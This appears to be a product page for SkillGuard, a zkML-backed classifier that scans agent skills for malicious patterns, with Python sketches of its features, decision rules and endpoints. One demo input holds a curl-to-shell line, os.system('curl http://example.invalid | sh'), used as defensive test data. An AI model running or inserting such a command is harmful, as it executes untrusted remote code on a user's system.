SkillGuard: SSL for Agent Skills

Unforgeable cryptographic safety guardrails for OpenClaw agent skills.

How It Works

Before an agent can transact, it installs skills — packages of code that give it new abilities. This is the agent skill supply chain. If a malicious skill enters the supply chain, every downstream action is compromised: stolen credentials, exfiltrated data, unauthorized transactions. SkillGuard is the cryptographic checkpoint at the boundary.

1. Skill submitted

A developer publishes a skill to ClawHub, or submits data directly via the API.

2. Features extracted

35 security signals are analyzed: shell exec, reverse shells, credential access, obfuscation, entropy, exfiltration, density ratios, interaction terms. Code blocks in SKILL.md are extracted and scanned.

3. Classified with proof

A neural network classifies the skill. Jolt Atlas generates a ~53 KB SNARK proof of the computation.

4. Anyone verifies

The proof can be independently verified in milliseconds, with no trust in SkillGuard required.

5. Classification made

ALLOW, FLAG, or DENY. The proof becomes a tamperproof safety certificate for the skill.

Like an SSL certificate for agent skills: every classification is backed by a zero-knowledge machine learning proof — a cryptographic receipt that the neural network ran correctly on the claimed inputs. The proof reveals the decision but not the model weights. Anyone can verify. No one can forge.

How the Classifier Works

The classifier is a small neural network that learned to spot dangerous patterns by studying hundreds of examples of safe and malicious skills. It doesn't "understand" code — it counts security-relevant signals and uses learned patterns to decide.

Feature Extraction (35 signals)

Each skill is reduced to 35 numbers: shell exec count, network calls, obfuscation score, reverse shell patterns, credential access, author reputation, download counts, byte entropy, code density ratios, and more. Code blocks inside SKILL.md files are extracted and scanned even when no separate scripts exist. Each value is scaled to 0–128.
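To make the idea of reducing a skill to scaled numbers concrete, here is a minimal sketch of two of the signals named above (byte entropy and a shell exec count) mapped onto the 0–128 range. The function names, the substring patterns, and the cap used for scaling are assumptions for illustration; the actual extractor and its normalization constants are not described here.

```python
import math
from collections import Counter

SCALE = 128  # upper bound of the feature range stated in the text


def byte_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def count_pattern(text: str, needles: tuple[str, ...]) -> int:
    """Count occurrences of simple substrings (hypothetical stand-in for real pattern matching)."""
    return sum(text.count(n) for n in needles)


def scale_feature(value: float, max_value: float) -> int:
    """Clamp value to [0, max_value] and map it linearly onto the integers 0..128.

    max_value is an assumed cap; the real per-feature caps are not given in the text.
    """
    clamped = min(max(value, 0.0), max_value)
    return round(clamped / max_value * SCALE)


if __name__ == "__main__":
    script = "import os\nos.system('curl http://example.invalid | sh')\n"
    shell_execs = count_pattern(script, ("os.system", "subprocess."))
    entropy = byte_entropy(script.encode())
    print(scale_feature(shell_execs, max_value=10.0))  # assumed cap of 10 calls
    print(scale_feature(entropy, max_value=8.0))       # 8 bits is the true maximum
```

Clamping before scaling keeps every feature inside the fixed integer range, which matters once the values feed an integer-only network.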

Neural Network (4,460 params)

Three layers of neurons (35→56→40→4) mix the features into progressively higher-level patterns. Layer 1 detects basic combinations ("obfuscation + shell exec"). Layer 2 builds compound indicators ("credential stealer" vs "API client"). Layer 3 outputs four scores: SAFE, CAUTION, DANGEROUS, MALICIOUS. Highest wins.
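The 4,460 figure follows directly from the 35→56→40→4 layer sizes if each layer is fully connected with one bias per output neuron (an assumption, though it reproduces the stated total exactly). The short sketch below checks that arithmetic and shows the "highest wins" rule; the helper names are illustrative.

```python
LAYER_SIZES = [35, 56, 40, 4]
CLASSES = ("SAFE", "CAUTION", "DANGEROUS", "MALICIOUS")


def count_params(sizes: list[int]) -> int:
    """Weights (n_in * n_out) plus biases (n_out) for each fully connected layer."""
    return sum(n_in * n_out + n_out for n_in, n_out in zip(sizes, sizes[1:]))


def top_class(scores: list[int]) -> str:
    """Return the label with the highest raw score (first one wins on ties)."""
    best = max(range(len(scores)), key=scores.__getitem__)
    return CLASSES[best]


if __name__ == "__main__":
    # 35*56+56 = 2016, 56*40+40 = 2280, 40*4+4 = 164
    print(count_params(LAYER_SIZES))
    print(top_class([12, 40, 95, 30]))
```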

Confidence & Decisions

Raw scores are converted to probabilities via softmax (T=12.8). If the distribution is spread out (high entropy), the model flags it for human review. DANGEROUS/MALICIOUS results need ≥50% confidence for DENY; otherwise they're flagged. SAFE/CAUTION results get ALLOW unless entropy is too high.
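The decision rules above can be sketched as follows. The temperature (12.8) and the 50% DENY threshold come from the text; the entropy cutoff is not stated, so `ENTROPY_LIMIT` below is a hypothetical value, and normalizing entropy by its maximum is likewise an assumption. The sketch also assumes the temperature divides the raw scores and that a DANGEROUS/MALICIOUS result at or above 50% confidence is denied regardless of entropy.

```python
import math

CLASSES = ("SAFE", "CAUTION", "DANGEROUS", "MALICIOUS")
TEMPERATURE = 12.8      # from the text
DENY_CONFIDENCE = 0.5   # from the text
ENTROPY_LIMIT = 0.85    # HYPOTHETICAL cutoff on normalized entropy (0..1)


def softmax(scores, temperature=TEMPERATURE):
    """Temperature-scaled softmax, shifted by the max for numerical stability."""
    scaled = [s / temperature for s in scores]
    m = max(scaled)
    exps = [math.exp(x - m) for x in scaled]
    total = sum(exps)
    return [e / total for e in exps]


def normalized_entropy(probs):
    """Shannon entropy divided by its maximum, so 1.0 means a uniform distribution."""
    h = -sum(p * math.log(p) for p in probs if p > 0)
    return h / math.log(len(probs))


def decide(scores):
    """Map four raw scores to (label, confidence, decision)."""
    probs = softmax(scores)
    top = max(range(len(probs)), key=probs.__getitem__)
    label, confidence = CLASSES[top], probs[top]
    if label in ("DANGEROUS", "MALICIOUS"):
        decision = "DENY" if confidence >= DENY_CONFIDENCE else "FLAG"
    else:
        decision = "FLAG" if normalized_entropy(probs) > ENTROPY_LIMIT else "ALLOW"
    return label, confidence, decision


if __name__ == "__main__":
    for scores in ([100, 0, 0, 0], [0, 0, 0, 100], [10, 10, 10, 10], [0, 0, 10, 12]):
        print(scores, decide(scores))
```

A higher temperature flattens the distribution, so more borderline skills end up flagged for review rather than allowed or denied outright.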

Integer Arithmetic & ZK Proofs

All math uses integers (scale=128) instead of floating-point, because the entire forward pass runs inside a zero-knowledge SNARK (Jolt Atlas). This produces a ~53 KB cryptographic proof that the classification was computed correctly. Anyone can verify the proof without trusting SkillGuard or seeing the model weights.
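As an illustration of integer-only math at scale 128, the sketch below represents a real number x as round(x × 128) and computes one fully connected layer without floating-point. The rescaling step (floor division after accumulation) and the function names are assumptions; the exact rounding behavior inside Jolt Atlas is not described here.

```python
SCALE = 128  # fixed-point scale from the text


def to_fixed(x: float) -> int:
    """Encode a real number as an integer at scale 128."""
    return round(x * SCALE)


def dense_fixed(inputs, weights, biases):
    """One fully connected layer in integer arithmetic.

    inputs  : list of ints at scale 128
    weights : one row of ints (scale 128) per output neuron
    biases  : list of ints at scale 128
    """
    outputs = []
    for row, bias in zip(weights, biases):
        acc = sum(w * x for w, x in zip(row, inputs))  # products are at scale 128 * 128
        outputs.append(acc // SCALE + bias)            # rescale to 128 (floor division, assumed)
    return outputs


if __name__ == "__main__":
    x = [to_fixed(0.5), to_fixed(1.0)]       # [64, 128]
    w = [[to_fixed(0.5), to_fixed(-0.25)]]   # [[64, -32]]
    b = [to_fixed(0.25)]                     # [32]
    out = dense_fixed(x, w, b)
    print(out, out[0] / SCALE)  # 0.5*0.5 + (-0.25)*1.0 + 0.25 = 0.25
```

Because every operation is an integer add, multiply, or division, a prover and a verifier can reproduce the same result exactly, with no platform-dependent floating-point rounding to reconcile.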

Trained on 690 skill profiles (balanced across 4 classes, including unknown-metadata samples). 93.9% cross-validated accuracy. Adversarially hardened with FGSM perturbations.

x402 Payment

Price per provable classification: $0.001 USDC

Includes: zkML proof

Network: Base (eip155:8453)

Protocol: HTTP 402 / x402

ZKML Proving

Proving Scheme: Jolt / Dory

Model Size: 4,460 params (35-56-40-4)

Endpoints

Method	Path	Auth	Price
POST	`/api/v1/evaluate`	API key or x402	$0.001
POST	`/api/v1/verify`	None	Free
GET	`/health`	None	Free
GET	`/stats`	None	Free
GET	`/openapi.json`	None	Free
GET	`/.well-known/ai-plugin.json`	None	Free
GET	`/.well-known/llms.txt`	None	Free
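A client might encode the table above as data so that it only builds requests for known endpoints. The sketch below is illustrative: `BASE_URL` is a hypothetical placeholder, and no request bodies or auth headers are shown because their format is not given here (the `/openapi.json` endpoint is the place to look for the real schema). Nothing is sent over the network.

```python
from urllib.request import Request

BASE_URL = "https://skillguard.example"  # HYPOTHETICAL host, replace with the real service URL

# (method, path) -> auth requirement and price in USDC, copied from the endpoint table
ENDPOINTS = {
    ("POST", "/api/v1/evaluate"): {"auth": "API key or x402", "price_usdc": 0.001},
    ("POST", "/api/v1/verify"): {"auth": None, "price_usdc": 0.0},
    ("GET", "/health"): {"auth": None, "price_usdc": 0.0},
    ("GET", "/stats"): {"auth": None, "price_usdc": 0.0},
    ("GET", "/openapi.json"): {"auth": None, "price_usdc": 0.0},
    ("GET", "/.well-known/ai-plugin.json"): {"auth": None, "price_usdc": 0.0},
    ("GET", "/.well-known/llms.txt"): {"auth": None, "price_usdc": 0.0},
}


def build_request(method: str, path: str) -> Request:
    """Build (but do not send) a request for a known endpoint."""
    if (method, path) not in ENDPOINTS:
        raise ValueError(f"unknown endpoint: {method} {path}")
    return Request(BASE_URL + path, method=method)


def free_endpoints() -> list[str]:
    """Paths that need neither payment nor an API key."""
    return sorted(path for (_, path), info in ENDPOINTS.items() if info["price_usdc"] == 0)


if __name__ == "__main__":
    req = build_request("GET", "/openapi.json")
    print(req.get_method(), req.full_url)
    print(free_endpoints())
```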
